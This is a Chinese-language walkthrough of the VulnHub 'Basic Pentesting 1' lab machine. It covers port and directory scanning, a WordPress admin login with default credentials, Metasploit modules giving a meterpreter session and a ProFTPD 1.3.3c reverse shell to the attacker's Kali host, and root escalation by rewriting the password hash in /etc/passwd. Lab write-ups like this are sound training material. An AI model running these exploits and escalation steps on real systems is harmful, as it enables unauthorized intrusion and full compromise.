靶机下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova
一、环境安装
双击下载好的.ova文件即可在VMware上打开
网卡这里确保与kali使用同一网卡,处于同一网段
二、信息收集
先确定kali的ip:192.168.231.133
扫描一下靶机的ip:192.168.231.196
arp-scan -l
确定好目标后,还是老规矩扫个端口
nmap -p- -A -sS 192.168.231.196
这里开放了21(ftp),22(ssh),80(http)端口
既然有80端口,尝试访问一下顺便扫个目录
这里还是用dirsearch
kali没有自带
apt-get update
apt-get install dirsearch直接输入这俩条命令就可以安装
dirsearch -u http://192.168.231.196
这里探测出 /secret 这一个
先看看首页面,看着没什么有用的信息
那就看看/secret
看起来是一个wordpress的cms搭建的平台
三、getshell + 权限提升
方法一 wp
既然是wordpress搭建的网站,根据它的历史漏洞思路,我们再用dirsearch扫一手二级目录看能不能找到后台页面
dirsearch -u http://192.168.231.196/secret
这里探测出很多,最重要的还是探测出/wp-admin,这个后台地址访问一手试试
这里出现了登陆界面
正准备试试弱口令发现url被重定向到vtcsec这里,手动重新换上目标的ip
简单一试 用户名和密码都是 admin admin
既然知道了账号密码,那就更简单了
直接上msf搜索历史漏洞
msfconsole
search wp_admin
确实存在
use 0 #使用搜索到的脚本
show options #查看需要设置的参数
set USERNAME admin
set PASSWORD admin
set RHOSTS 192.168.231.196
set TARGETURI /secret
run成功拿到 meterpreter 会话
我们转成交互式的会话
shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权的话这里发现 sudo -l 需要密码,只能换个方法
ctrl + c 然后输入 N ,返回meterpreter会话
meterpreter 下有个edit 命令,是类似于vim编辑器的,用来编辑文件的
知道了,/etc/passwd 第二位x,是密码占位符,密码其实是加密存储在/etc/shadow下的,可以假设x 位密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.正好可以利用edit来进行编辑
大概意思就是系统会先读取/etc/passwd中的密码,如果没有再去读/etc/shadow里,所以我们修改/etc/passwd中的密码即可
利用openssl passwd -1,生成密码,密码明文为admin
$1$c06.peqf$MTGVzyPQgQvLTvT.Xk64B1meterpreter下,输入命令:edit /etc/passwd,发现可以编辑,将之前生成的密码替换x的位置,然后wq保存设置
然后重新转成交互式的会话
shell
python -c 'import pty;pty.spawn("/bin/bash")'然后直接su root ,输入密码 admin 即可提权成功
方法二 ftp
开放了个21端口的ftp服务,并且版本是ProFTPD 1.3.3c,去看看msf上有没有历史漏洞
msfconsole
search proftpd 1.3.3
看了看确实有,那事情就简单多了,use 10,选择后
show options 看看必选项
这里只需要填一下ip和端口就行
那就顺便再设置一下payload
set LHOST 192.168.231.133 #kali的ip
set LpORT 9999 #kali的监听端口
set payload cmd/unix/reverse
set RHOSTS 192.168.231.196 #靶机的ip
set RPORT 21
run这里就成功拿到shell并且还是root权限
